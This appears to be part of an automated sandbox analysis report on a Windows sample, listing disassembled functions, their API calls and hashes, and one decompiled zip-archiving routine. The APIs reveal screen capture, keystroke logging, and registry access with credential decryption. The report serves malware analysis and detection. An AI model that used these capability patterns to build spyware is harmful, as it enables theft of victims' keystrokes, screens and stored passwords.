GetDC.USER32 ref: 00411DFD
CreateCompatibleDC.GDI32 ref: 00411E08
CreateCompatibleBitmap.GDI32(?,?), ref: 00411E1D
SelectObject.GDI32 ref: 00411E4F
BitBlt.GDI32(00000000,00000000), ref: 00411E91
GetDIBits.GDI32 ref: 00411F17
calloc.MSVCRT ref: 00411F9C
GetDIBits.GDI32 ref: 00411FD7
ReleaseDC.USER32 ref: 00412044
DeleteDC.GDI32(00000000), ref: 00412052
DeleteObject.GDI32 ref: 0041205B
free.MSVCRT(?,00000000), ref: 004120B2

Strings

BM, xrefs: 00411F32
, xrefs: 00411E5A
(, xrefs: 00411F58
(, xrefs: 00412003
6, xrefs: 00411F47

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: BitsCompatibleCreateDeleteMetricsObjectSystem$BitmapDesktopReleaseSelectWindowcallocfree
String ID: $($($6$BM
API String ID: 3075093512-2637400849
Opcode ID: d7d7e5d3c01187142e8c43228c98c6042b0c96f3a722dfa341cae57414d2b9e1
Instruction ID: c42d9fa6f562a18c3eedbb1c72d559f421865ac330c7369b2ec7bacda9b62638
Opcode Fuzzy Hash: d7d7e5d3c01187142e8c43228c98c6042b0c96f3a722dfa341cae57414d2b9e1
Instruction Fuzzy Hash: 4781BDB05093409FD310EF6AD68475BBBE4AF88744F40892EF58887351E7B9D8888B5B

Uniqueness

Uniqueness Score: -1.00%

Function 00409953, Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 210keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32 ref: 0040996B
GetKeyState.USER32 ref: 0040997A
GetKeyState.USER32 ref: 00409987
GetKeyState.USER32 ref: 00409994
GetKeyboardState.USER32(00000000), ref: 004099A4
MapVirtualKeyW.USER32(00000000,00000000), ref: 00409B33
ToUnicode.USER32 ref: 00409B60
WideCharToMultiByte.KERNEL32 ref: 00409BAA
GetKeyState.USER32 ref: 00409BB9
MapVirtualKeyW.USER32 ref: 00409C01
GetKeyNameTextW.USER32 ref: 00409C21
GetKeyState.USER32 ref: 00409C38
WideCharToMultiByte.KERNEL32 ref: 00409CA8

Strings

@, xrefs: 00409B49
@, xrefs: 00409C12
@, xrefs: 00409C81

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: State$ByteCharMultiVirtualWide$KeyboardNameTextUnicode
String ID: @$@$@
API String ID: 284565539-1177533131
Opcode ID: a7201299a71ac298b4eb1a048ca88babafc008e2bbcecdb455fdf88870e38ce2
Instruction ID: 165817b8f912d8248abf4659c11c564849502453b133aa370f8f06421a69fc02
Opcode Fuzzy Hash: a7201299a71ac298b4eb1a048ca88babafc008e2bbcecdb455fdf88870e38ce2
Instruction Fuzzy Hash: 5D815AB0608351DAD720AF59D4C436FBAF4FB81304F51892FE4D566282C3BD49859F6B

Uniqueness

Uniqueness Score: -1.00%

Function 0040C4B7, Relevance: 26.9, APIs: 13, Strings: 2, Instructions: 656registryencryptionCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 0040C503
RegEnumKeyExA.ADVAPI32 ref: 0040C55F
RegOpenKeyExA.ADVAPI32 ref: 0040C5CE
RegCloseKey.ADVAPI32 ref: 0040C9E3

Part of subcall function 0040C46E: RegQueryValueExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,0040CB2E), ref: 0040C4A6

RegOpenKeyExA.ADVAPI32 ref: 0040CA1C
RegEnumKeyExA.ADVAPI32 ref: 0040CA78
RegOpenKeyExA.ADVAPI32 ref: 0040CAE7
RegCloseKey.ADVAPI32 ref: 0040CF16

Part of subcall function 004127A8: _vsnprintf.MSVCRT ref: 004127CC

RegCloseKey.ADVAPI32 ref: 0040CEFC
CryptUnprotectData.CRYPT32 ref: 0040CF7D
LocalFree.KERNEL32 ref: 0040CFAC
CryptUnprotectData.CRYPT32 ref: 0040D072
LocalFree.KERNEL32 ref: 0040D0A1

Strings

~7B, xrefs: 0040D0CF
?, xrefs: 0040C5AF

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: Open$Close$CryptDataEnumFreeLocalUnprotect$QueryValue_vsnprintf
String ID: ?$~7B
API String ID: 1208127340-2629379569
Opcode ID: 5a1fc56df2489b25b4cedc4e0506998633517c783dbd7c47ba6df25c79f77c59
Instruction ID: c2d439ac8c23cb570df0ab79087284893563063e171fb1edf2eb3d6011b472d7
Opcode Fuzzy Hash: 5a1fc56df2489b25b4cedc4e0506998633517c783dbd7c47ba6df25c79f77c59
Instruction Fuzzy Hash: DA726BB0408345AFD710EF6AC58525EFBF0BF88748F408E2EE4D897291D7B995498F46

Uniqueness

Uniqueness Score: -1.00%

Function 0041D049, Relevance: 25.0, APIs: 11, Strings: 3, Instructions: 453
fileCOMMONCrypto

Download Yara Rule

C-Code - Quality: 15%

			E0041D049(signed int __ecx, signed int __edx, intOrPtr* _a4, signed int _a8, char* _a12, char* _a16, signed short _a20, signed char _a24, intOrPtr _a28) {
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v42;
				char _v46;
				char _v50;
				char _v51;
				unsigned short _v52;
				char _v53;
				unsigned short _v54;
				char _v56;
				char _v60;
				char _v61;
				char _v62;
				char _v63;
				void _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				char _v92;
				signed short _v94;
				signed short _v96;
				signed short _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed short _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				void* _v164;
				signed int _v168;
				intOrPtr _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				intOrPtr _v208;
				void* _v212;
				signed int _v216;
				signed short _v220;
				signed int _v224;
				signed int _v228;
				void* _v232;
				signed char _t265;
				signed short _t270;
				char* _t282;
				struct _IO_FILE* _t286;
				signed int _t289;
				signed int _t294;
				signed int _t295;
				void* _t304;
				signed int _t316;
				void* _t332;
				signed int _t344;
				signed int _t347;
				signed int _t349;
				signed int _t355;
				int _t358;
				void* _t367;
				signed int _t369;
				signed int _t371;
				int _t376;
				void* _t379;
				char* _t381;
				void* _t392;
				char* _t393;
				unsigned short _t394;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t410;
				signed int _t417;
				unsigned short _t422;
				signed int _t441;
				char* _t447;
				signed int _t448;
				void* _t449;
				signed int _t451;
				char _t452;
				signed int _t453;
				signed int _t454;
				void* _t455;
				char** _t456;

				_t410 = __edx;
				_t397 = __ecx;
				_t456 = _t455 - 0xdc;
				_t449 = _a4;
				_v96 = 0;
				_v94 = 0;
				_v112 = _a20;
				_t265 = _a24;
				if(_t265 < 0) {
					_t265 = 6;
				}
				if(_t449 == 0 ||  *((intOrPtr*)(_t449 + 0x48)) == 0 ||  *((intOrPtr*)(_t449 + 0x14)) != 2 || _a8 == 0) {
					L17:
					_t441 = 0;
					goto L61;
				} else {
					_t451 = _t265 & 0x0000000f;
					_t398 = _t397 & 0xffffff00 | _v112 != 0x00000000;
					if((_t398 & (_t410 & 0xffffff00 | _a16 == 0x00000000)) == 0 && _t451 - 0xa > 0 <= 0 && (_t265 & 0x00000004) == 0 && E00414919(_a8) != 0) {
						asm("repne scasb");
						_t270 =  !(_t398 | 0xffffffff) - 1;
						_v140 = _t270;
						if(_t270 > 0xffff) {
							goto L17;
						}
						_t392 = E0041493A(_t449);
						if( *(_t449 + 0x10) == 0xffff) {
							goto L17;
						}
						_v144 = 0;
						_v164 =  *_t449;
						_v160 =  *((intOrPtr*)(_t449 + 4));
						asm("adc edx, [esp+0x4c]");
						_v124 = _t392 + _v164;
						_v120 = 0;
						_v148 = _v140;
						asm("adc edx, 0x0");
						asm("adc edx, [esp+0x5c]");
						asm("adc edx, [esp+0x74]");
						if(0 > 0) {
							goto L17;
						}
						_v232 =  &_v64;
						_t282 = _a12;
						 *_t456 = _t282;
						L0041F7B4();
						if(_t282 != 0) {
							goto L17;
						}
						E00415FC6(_v36,  &_v94,  &_v96);
						_v232 = 0x424983;
						 *_t456 = _a12;
						_t286 = fopen(??, ??);
						_v168 = _t286;
						if(_t286 == 0) {
							goto L17;
						}
						_v228 = 2;
						_v232 = 0;
						 *_t456 = _t286;
						fseek(??, ??, ??);
						 *_t456 = _v168;
						_t289 = ftell(??);
						_v136 = _t289;
						_v156 = _t289;
						_v152 = _t289 >> 0x1f;
						_v228 = 0;
						_v232 = 0;
						 *_t456 = _v168;
						fseek(??, ??, ??);
						if(_v152 <= 0) {
							__eflags = _v136 - 3;
							if(__eflags <= 0) {
								_t451 = 0;
								__eflags = 0;
							}
							_t393 = _t392 + 0x1e;
							 *_t456 = _t393;
							_t294 = E00414DC1(_t449, _v160, _v164, __eflags);
							__eflags = _t294;
							_t441 = _t294;
							if(_t294 != 0) {
								_t417 =  *(_t449 + 0x24);
								_t295 =  *(_t449 + 0x20);
								__eflags = _t417 | _t295;
								if((_t417 | _t295) != 0) {
									asm("adc edx, 0xffffffff");
									__eflags = _t417 & _v120 | _t295 + 0xffffffff & _v124;
									if((_t417 & _v120 | _t295 + 0xffffffff & _v124) != 0) {
										_v228 = 0x18d6;
										_v232 = 0x424620;
										 *_t456 = "(local_dir_header_ofs & (pZip->m_file_offset_alignment - 1)) == 0";
										L0041F7E4();
									}
								}
								asm("adc edx, [esp+0x4c]");
								_v164 =  &(_t393[_v164]);
								_v160 = 0;
								memset( &_v64, 0, 0x1e << 0);
								_t456 =  &(_t456[3]);
								_v228 = _v160;
								_v220 = _v140;
								_v224 = _a8;
								_v232 = _v164;
								 *_t456 =  *(_t449 + 0x44);
								_t304 =  *((intOrPtr*)(_t449 + 0x3c))();
								__eflags = _v140 - _t304;
								if(_v140 != _t304) {
									goto L16;
								} else {
									asm("adc edx, [esp+0x4c]");
									_v148 = _v164 + _v148;
									__eflags = _v136 | _v152;
									if((_v136 | _v152) == 0) {
										_t452 = 0;
										__eflags = 0;
										_v164 = 0;
										_v132 = _v136;
										_v116 = _v152;
										L56:
										 *_t456 = _v168;
										fclose(??);
										__eflags = _v116;
										if(_v116 > 0) {
											goto L17;
										}
										__eflags = _v144;
										if(_v144 > 0) {
											goto L17;
										}
										_t422 = _v94;
										__eflags = _t452 - 1;
										_t394 = _v96;
										_t316 = memset( &_v64, 0, 0x1e << 0);
										_t456 =  &(_t456[3]);
										asm("sbb eax, eax");
										_v52 = _t422;
										_v51 = _t422 >> 8;
										_v54 = _t394;
										_v60 =  !_t316 & 0x00000014;
										_v64 = 0x50;
										_v56 = _t452;
										_v63 = 0x4b;
										_v62 = 3;
										_v61 = 4;
										_v53 = _t394 >> 8;
										E00414900( &_v50, _v164);
										E00414900( &_v46, _v132);
										E00414900( &_v42, _v136);
										_v220 = 0x1e;
										_v36 = 0;
										_v35 = 0;
										_v38 = _v140;
										_v228 = _v120;
										_v37 = _v140 >> 8;
										_v224 =  &_v64;
										_v232 = _v124;
										 *_t456 =  *(_t449 + 0x44);
										_t332 =  *((intOrPtr*)(_t449 + 0x3c))();
										__eflags = _t332 - 0x1e;
										if(_t332 != 0x1e) {
											goto L17;
										}
										_v208 = _t452;
										_v188 = _a28;
										_v192 = _v120;
										_v196 = _v124;
										_v224 = _v152;
										_v200 = _v94 & 0x0000ffff;
										_v204 = _v96 & 0x0000ffff;
										_v212 = _v164;
										_v220 = _v132;
										_v216 = _v116;
										_v228 = _v156;
										_v232 = _v112 & 0x0000ffff;
										 *_t456 = _a16;
										_t344 = E00416311(_t449, _v140 & 0x0000ffff, _a8);
										__eflags = _t344;
										if(_t344 == 0) {
											goto L17;
										}
										_t441 = 1;
										_t261 = _t449 + 0x10;
										 *_t261 =  *(_t449 + 0x10) + 1;
										__eflags =  *_t261;
										 *_t449 = _v148;
										 *((intOrPtr*)(_t449 + 4)) = _v144;
										goto L61;
									}
									_v228 = 0x10000;
									_v232 = 1;
									 *_t456 =  *(_t449 + 0x34);
									_t347 =  *((intOrPtr*)(_t449 + 0x28))();
									__eflags = _t347;
									_t396 = _t347;
									if(_t347 == 0) {
										goto L16;
									}
									__eflags = _t451;
									if(_t451 != 0) {
										_v228 = 0x4df40;
										_v232 = 1;
										 *_t456 =  *(_t449 + 0x34);
										_t349 =  *((intOrPtr*)(_t449 + 0x28))();
										__eflags = _t349;
										_t447 = _t349;
										if(_t349 == 0) {
											L52:
											_v232 = _t396;
											 *_t456 =  *(_t449 + 0x34);
											 *((intOrPtr*)(_t449 + 0x2c))();
											goto L16;
										}
										_v228 = 0;
										_v232 = 0xfffffff1;
										 *_t456 = _t451;
										_v92 = _t449;
										_v80 = _v144;
										_v84 = _v148;
										_v76 = 0;
										_v72 = 0;
										_v224 = E0041A99E();
										_v232 = E00416018;
										 *_t456 = _t447;
										_v228 =  &_v92;
										_t355 = E0041A64C();
										__eflags = _t355;
										if(_t355 == 0) {
											_v164 = 0;
											_v148 = _v156;
											_v144 = _v152;
											do {
												__eflags = _v144;
												if(_v144 > 0) {
													L45:
													_t453 = 0x10000;
													L46:
													_v228 = _t453;
													_v232 = 1;
													 *_t456 = _t396;
													_v224 = _v168;
													_t358 = fread(??, ??, ??, ??);
													__eflags = _t453 - _t358;
													if(_t453 != _t358) {
														break;
													}
													_v228 = _t453;
													_v232 = _t396;
													 *_t456 = _v164;
													_t367 = E004171DA();
													_v148 = _v148 - _t453;
													_v164 = _t367;
													asm("sbb [esp+0x5c], edx");
													_v228 = _t453;
													_t369 = _v144 | _v148;
													_v232 = _t396;
													 *_t456 = _t447;
													__eflags = _t369 - 1;
													asm("sbb eax, eax");
													_v224 = _t369 & 0x00000004;
													_t371 = E0041A5F0();
													__eflags = _t371 - 1;
													if(_t371 == 1) {
														_t454 = 1;
														L51:
														_v232 = _t447;
														 *_t456 =  *(_t449 + 0x34);
														 *((intOrPtr*)(_t449 + 0x2c))();
														__eflags = _t454;
														if(_t454 != 0) {
															_t452 = 8;
															_v132 = _v76;
															_v144 = _v80;
															_v116 = _v72;
															_v148 = _v84;
															L54:
															_v232 = _t396;
															 *_t456 =  *(_t449 + 0x34);
															 *((intOrPtr*)(_t449 + 0x2c))();
															goto L56;
														}
														goto L52;
													}
													goto L48;
												}
												__eflags = _v148 - 0xffff;
												if(_v148 > 0xffff) {
													goto L45;
												}
												_t453 = _v148;
												goto L46;
												L48:
												__eflags = _t371;
											} while (_t371 == 0);
											_t454 = 0;
											goto L51;
										}
										_v232 = _t447;
										 *_t456 =  *(_t449 + 0x34);
										 *((intOrPtr*)(_t449 + 0x2c))();
										goto L52;
									}
									_v164 = 0;
									_v132 = _v156;
									_v128 = _v152;
									do {
										__eflags = _v128;
										if(_v128 > 0) {
											L33:
											_t448 = 0x10000;
											L34:
											_v228 = _t448;
											_v232 = 1;
											 *_t456 = _t396;
											_v224 = _v168;
											_t376 = fread(??, ??, ??, ??);
											__eflags = _t448 - _t376;
											if(_t448 != _t376) {
												goto L52;
											}
											_v220 = _t448;
											_v224 = _t396;
											_v232 = _v148;
											_v228 = _v144;
											 *_t456 =  *(_t449 + 0x44);
											_t379 =  *((intOrPtr*)(_t449 + 0x3c))();
											__eflags = _t448 - _t379;
											if(_t448 != _t379) {
												goto L52;
											}
											goto L36;
										}
										__eflags = _v132 - 0x10000;
										if(_v132 > 0x10000) {
											goto L33;
										}
										_t448 = _v132;
										goto L34;
										L36:
										_v228 = _t448;
										_v232 = _t396;
										 *_t456 = _v164;
										_t381 = E004171DA();
										_v132 = _v132 - _t448;
										_v164 = _t381;
										asm("sbb [esp+0x6c], edx");
										_v148 = _v148 + _t448;
										asm("adc [esp+0x5c], edx");
										__eflags = _v128 | _v132;
									} while ((_v128 | _v132) != 0);
									_t452 = 0;
									_v132 = _v136;
									_v116 = _v152;
									goto L54;
								}
							} else {
								 *_t456 = _v168;
								fclose(??);
								L61:
								return _t441;
							}
						}
						L16:
						 *_t456 = _v168;
						fclose(??);
					}
					goto L17;
				}
			}

0x0041d049
0x0041d049
0x0041d04d
0x0041d05a
0x0041d061
0x0041d06b
0x0041d075
0x0041d079
0x0041d082
0x0041d084
0x0041d084
0x0041d08b
0x0041d249
0x0041d249
0x00000000
0x0041d0b3
0x0041d0b5
0x0041d0be
0x0041d0ce
0x0041d109
0x0041d10d
0x0041d115
0x0041d119
0x00000000
0x00000000
0x0041d12d
0x0041d12f
0x00000000
0x00000000
0x0041d13a
0x0041d142
0x0041d146
0x0041d152
0x0041d156
0x0041d15e
0x0041d164
0x0041d170
0x0041d177
0x0041d17f
0x0041d186
0x00000000
0x00000000
0x0041d193
0x0041d197
0x0041d19e
0x0041d1a1
0x0041d1a8
0x00000000
0x00000000
0x0041d1c3
0x0041d1cf
0x0041d1d7
0x0041d1da
0x0041d1e1
0x0041d1e5
0x00000000
0x00000000
0x0041d1e7
0x0041d1ef
0x0041d1f7
0x0041d1fa
0x0041d203
0x0041d206
0x0041d20b
0x0041d20f
0x0041d216
0x0041d21e
0x0041d226
0x0041d22e
0x0041d231
0x0041d23b
0x0041d250
0x0041d255
0x0041d257
0x0041d257
0x0041d257
0x0041d261
0x0041d264
0x0041d269
0x0041d26e
0x0041d270
0x0041d272
0x0041d285
0x0041d288
0x0041d28d
0x0041d28f
0x0041d294
0x0041d29f
0x0041d2a1
0x0041d2a3
0x0041d2ab
0x0041d2b3
0x0041d2ba
0x0041d2ba
0x0041d2a1
0x0041d2c7
0x0041d2d0
0x0041d2d6
0x0041d2e7
0x0041d2e7
0x0041d2ed
0x0041d2f1
0x0041d2fc
0x0041d304
0x0041d30b
0x0041d30e
0x0041d311
0x0041d315
0x00000000
0x0041d31b
0x0041d327
0x0041d32b
0x0041d333
0x0041d33b
0x0041d5f6
0x0041d5f6
0x0041d5f8
0x0041d600
0x0041d608
0x0041d60c
0x0041d610
0x0041d613
0x0041d618
0x0041d61d
0x00000000
0x00000000
0x0041d623
0x0041d628
0x00000000
0x00000000
0x0041d635
0x0041d644
0x0041d648
0x0041d64f
0x0041d64f
0x0041d651
0x0041d653
0x0041d660
0x0041d66e
0x0041d679
0x0041d682
0x0041d68a
0x0041d698
0x0041d6a0
0x0041d6a8
0x0041d6b0
0x0041d6b7
0x0041d6c7
0x0041d6d7
0x0041d6e4
0x0041d6ec
0x0041d6f4
0x0041d6fc
0x0041d707
0x0041d70f
0x0041d71d
0x0041d725
0x0041d72c
0x0041d72f
0x0041d732
0x0041d735
0x00000000
0x00000000
0x0041d74b
0x0041d74f
0x0041d757
0x0041d75f
0x0041d76b
0x0041d776
0x0041d782
0x0041d78a
0x0041d792
0x0041d79a
0x0041d7a2
0x0041d7ab
0x0041d7b6
0x0041d7bb
0x0041d7c0
0x0041d7c2
0x00000000
0x00000000
0x0041d7d0
0x0041d7d5
0x0041d7d5
0x0041d7d5
0x0041d7d8
0x0041d7da
0x00000000
0x0041d7da
0x0041d341
0x0041d349
0x0041d354
0x0041d357
0x0041d35a
0x0041d35c
0x0041d35e
0x00000000
0x00000000
0x0041d364
0x0041d366
0x0041d43c
0x0041d444
0x0041d44f
0x0041d452
0x0041d455
0x0041d457
0x0041d459
0x0041d5a0
0x0041d5a0
0x0041d5a7
0x0041d5aa
0x00000000
0x0041d5aa
0x0041d467
0x0041d46f
0x0041d477
0x0041d47a
0x0041d481
0x0041d488
0x0041d48f
0x0041d49a
0x0041d4aa
0x0041d4b5
0x0041d4bd
0x0041d4c0
0x0041d4c4
0x0041d4c9
0x0041d4cb
0x0041d4e7
0x0041d4ef
0x0041d4f3
0x0041d4f7
0x0041d4f7
0x0041d4fc
0x0041d50e
0x0041d50e
0x0041d513
0x0041d517
0x0041d51b
0x0041d523
0x0041d526
0x0041d52a
0x0041d52f
0x0041d531
0x00000000
0x00000000
0x0041d537
0x0041d53b
0x0041d53f
0x0041d542
0x0041d549
0x0041d54d
0x0041d551
0x0041d555
0x0041d55d
0x0041d561
0x0041d565
0x0041d568
0x0041d56b
0x0041d570
0x0041d574
0x0041d579
0x0041d57c
0x0041d58a
0x0041d58f
0x0041d58f
0x0041d596
0x0041d599
0x0041d59c
0x0041d59e
0x0041d5c0
0x0041d5c5
0x0041d5d0
0x0041d5d4
0x0041d5df
0x0041d5e3
0x0041d5e3
0x0041d5ea
0x0041d5ed
0x00000000
0x0041d5ed
0x00000000
0x0041d59e
0x00000000
0x0041d57c
0x0041d4fe
0x0041d506
0x00000000
0x00000000
0x0041d508
0x00000000
0x0041d57e
0x0041d57e
0x0041d57e
0x0041d586
0x00000000
0x0041d586
0x0041d4cd
0x0041d4d4
0x0041d4d7
0x00000000
0x0041d4d7
0x0041d374
0x0041d37c
0x0041d380
0x0041d384
0x0041d384
0x0041d389
0x0041d39b
0x0041d39b
0x0041d3a0
0x0041d3a4
0x0041d3a8
0x0041d3b0
0x0041d3b3
0x0041d3b7
0x0041d3bc
0x0041d3be
0x00000000
0x00000000
0x0041d3cc
0x0041d3d0
0x0041d3d4
0x0041d3d8
0x0041d3df
0x0041d3e2
0x0041d3e5
0x0041d3e7
0x00000000
0x00000000
0x00000000
0x0041d3e7
0x0041d38b
0x0041d393
0x00000000
0x00000000
0x0041d395
0x00000000
0x0041d3ed
0x0041d3f1
0x0041d3f5
0x0041d3f9
0x0041d3fc
0x0041d403
0x0041d407
0x0041d40b
0x0041d40f
0x0041d417
0x0041d41b
0x0041d41b
0x0041d429
0x0041d42b
0x0041d433
0x00000000
0x0041d433
0x0041d274
0x0041d278
0x0041d27b
0x0041d7dd
0x0041d7e9
0x0041d7e9
0x0041d272
0x0041d23d
0x0041d241
0x0041d244
0x0041d244
0x00000000
0x0041d0ce

APIs

_stat.MSVCRT ref: 0041D1A1
fopen.MSVCRT ref: 0041D1DA
fseek.MSVCRT ref: 0041D1FA
ftell.MSVCRT ref: 0041D206
fseek.MSVCRT ref: 0041D231
fclose.MSVCRT ref: 0041D244

Strings

P, xrefs: 0041D682
FB, xrefs: 0041D2AB
K, xrefs: 0041D698

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: fseek$_statfclosefopenftell
String ID: FB$K$P
API String ID: 2614710449-1627385504
Opcode ID: 54049fe808654b227bba1578e1d34335061ffaf98f8a99cde8e77accde8bca1c
Instruction ID: 2f0101dfcf5e0978000162e92f0ac79abf139ad8f29847253f420d5a98adee70
Opcode Fuzzy Hash: 54049fe808654b227bba1578e1d34335061ffaf98f8a99cde8e77accde8bca1c
Instruction Fuzzy Hash: 67229FB4A087818FD720DF69C18479BFBE1AF89744F10892EE9D887350E779D885CB46

Uniqueness

Uniqueness Score: -1.00%

Function 0040753D, Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 280fileCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 004075C4
SetErrorMode.KERNEL32 ref: 004076EB
MultiByteToWideChar.KERNEL32 ref: 0040771F
wcscat.MSVCRT ref: 00407732
FindFirstFileW.KERNEL32 ref: 00407745
FindClose.KERNEL32(?,?), ref: 00407775
WideCharToMultiByte.KERNEL32 ref: 00407809
MultiByteToWideChar.KERNEL32 ref: 00407932
wcscat.MSVCRT ref: 00407948

Part of subcall function 00406B2B: _wfopen.MSVCRT ref: 00406B69
Part of subcall function 00406B2B: fread.MSVCRT ref: 00406BA2
Part of subcall function 00406B2B: fclose.MSVCRT ref: 00406C1A

WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004079AB

Part of subcall function 004127A8: _vsnprintf.MSVCRT ref: 004127CC

Part of subcall function 00405D7D: EnterCriticalSection.KERNEL32 ref: 00405DAD
Part of subcall function 00405D7D: LeaveCriticalSection.KERNEL32 ref: 00405ECC

FindNextFileW.KERNEL32(?,?), ref: 00407A42

Strings

;/B, xrefs: 0040789A
8/B, xrefs: 00407798
!, xrefs: 00407951

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$Find$CriticalFileSectionwcscat$CloseEnterErrorFirstLeaveModeNext_vsnprintf_wfopenfclosefread
String ID: !$8/B$;/B
API String ID: 1195691543-3428488148
Opcode ID: 0db96d41e41699db9f656d7569e1933fb0474d28dc8816ba95a9ce2816225d2e
Instruction ID: 2942108eb55d8b4688eca57bfe31ed8b2614f53b08094f2a7ccf2ab1801ba34f
Opcode Fuzzy Hash: 0db96d41e41699db9f656d7569e1933fb0474d28dc8816ba95a9ce2816225d2e
Instruction Fuzzy Hash: 5DE1B0B09097819FD320EF25C58879FBBE0BF84744F41892EE4D897291D7B895898F87

Uniqueness

Uniqueness Score: -1.00%

Function 00406F83, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 184stringfileCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32 ref: 00407056
FindFirstFileA.KERNEL32 ref: 0040708A
strcmp.MSVCRT ref: 004070B2
strcmp.MSVCRT ref: 004070CA
strcat.MSVCRT ref: 00407110
fopen.MSVCRT ref: 00407157
strncpy.MSVCRT ref: 00407195
fclose.MSVCRT ref: 004071D3
strcpy.MSVCRT ref: 00407242
FindNextFileA.KERNEL32 ref: 0040725E
FindClose.KERNEL32 ref: 00407274

Strings

X/B, xrefs: 0040714C
;/B, xrefs: 004071EE

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: Find$Filestrcmp$CloseErrorFirstModeNextfclosefopenstrcatstrcpystrncpy
String ID: ;/B$X/B
API String ID: 1295692060-619761068
Opcode ID: cc94f65e219aa78bc87248342c53200a3b884502bad93e8bca9f56ca5310b663
Instruction ID: 6627613b86e129a79f3514e70df2e2269c09e6d90b38cf378645e3f88cd6e25a
Opcode Fuzzy Hash: cc94f65e219aa78bc87248342c53200a3b884502bad93e8bca9f56ca5310b663
Instruction Fuzzy Hash: 28811CB44087459FC710EF25C2846AEBBE4BF84318F45892EF9D89B342D7789486DF1A

